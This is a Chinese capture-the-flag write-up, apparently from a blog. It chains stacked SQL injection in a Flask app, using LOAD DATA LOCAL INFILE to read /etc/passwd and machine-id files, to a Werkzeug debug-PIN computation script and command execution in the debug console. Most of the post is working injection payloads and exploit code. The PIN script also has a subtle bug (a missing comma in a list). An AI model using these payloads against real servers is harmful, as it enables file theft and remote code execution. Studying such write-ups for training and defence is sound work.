db.session.execute(sql, params={"multi":True})  {"multi":True} 运行执行多行语句 存在sql堆叠注入

因此利用堆叠注入 load data local infile into table 读取文件内容

读取/etc/passwd:

';create table test(data varchar(1000));%23

';load data local infile "/etc/passwd" into table ctf.test;%23

'union select 1,2,3,group_concat(data),5 from ctf.test;%23

其他 配置文件同理 最终得到文件内容:

username   ->  ctfmac     ->    2485723332611/etc/machine-id   ->   96cec10d3d9307792745ec3b85c89620/proc/self/cgroup    ->  b10a06f1c0105bb2402a7e5d2e965c143de814597bafa25eeea9e79b7f6a7fb2/proc/sys/kernel/random/boot_id    ->   e43f0caf-bcf1-43e3-b632-6df789f55b4aapp.py 绝对路径   /usr/local/lib/python3.8/site-packages/flask/app.py

新版本是按 /etc/machine-id、/proc/sys/kernel/random/boot_id 顺序 从中读到一个值后立即break,然后和/proc/self/cgroup中的id值拼接,使用拼接的值来计算pin码

 所以这道题machine-id为:/etc/machine-id + /proc/self/cgroup

96cec10d3d9307792745ec3b85c89620b10a06f1c0105bb2402a7e5d2e965c143de814597bafa25eeea9e79b7f6a7fb2

 利用 flask-pin 码计算脚本:

import hashlib

from itertools import chain

probably_public_bits = [

'ctf' # username 可通过/etc/passwd获取

'flask.app', # modname默认值

'Flask', # 默认值 getattr(app, '__name__', getattr(app.__class__, '__name__'))

'/usr/local/lib/python3.8/site-packages/flask/app.py' # 路径 可报错得到 getattr(mod, '__file__', None)

]

private_bits = [

'2485723332611', # /sys/class/net/eth0/address mac地址十进制

'96cec10d3d9307792745ec3b85c89620b10a06f1c0105bb2402a7e5d2e965c143de814597bafa25eeea9e79b7f6a7fb2'

# 字符串合并:首先读取文件内容 /etc/machine-id(docker不用看) /proc/sys/kernel/random/boot_id /proc/self/cgroup

# 有machine-id 那就拼接machine-id + /proc/self/cgroup 否则 /proc/sys/kernel/random/boot_id + /proc/self/cgroup

]

# 下面为源码里面抄的,不需要修改

h = hashlib.sha1()

for bit in chain(probably_public_bits, private_bits):

if not bit:

continue

if isinstance(bit, str):

bit = bit.encode('utf-8')

h.update(bit)

h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None

if num is None:

h.update(b'pinsalt')

num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv = None

if rv is None:

for group_size in 5, 4, 3:

if len(num) % group_size == 0:

rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')

for x in range(0, len(num), group_size))

break

else:

rv = num

print(rv)

得到 pin码:336-852-896

进入 /console   os.popen().read()执行命令即可  

参考:

Flask算PIN值 - Pysnow's Blog

文章来源

评论可见,请评论后查看内容,谢谢!!!
 您阅读本篇文章共花了: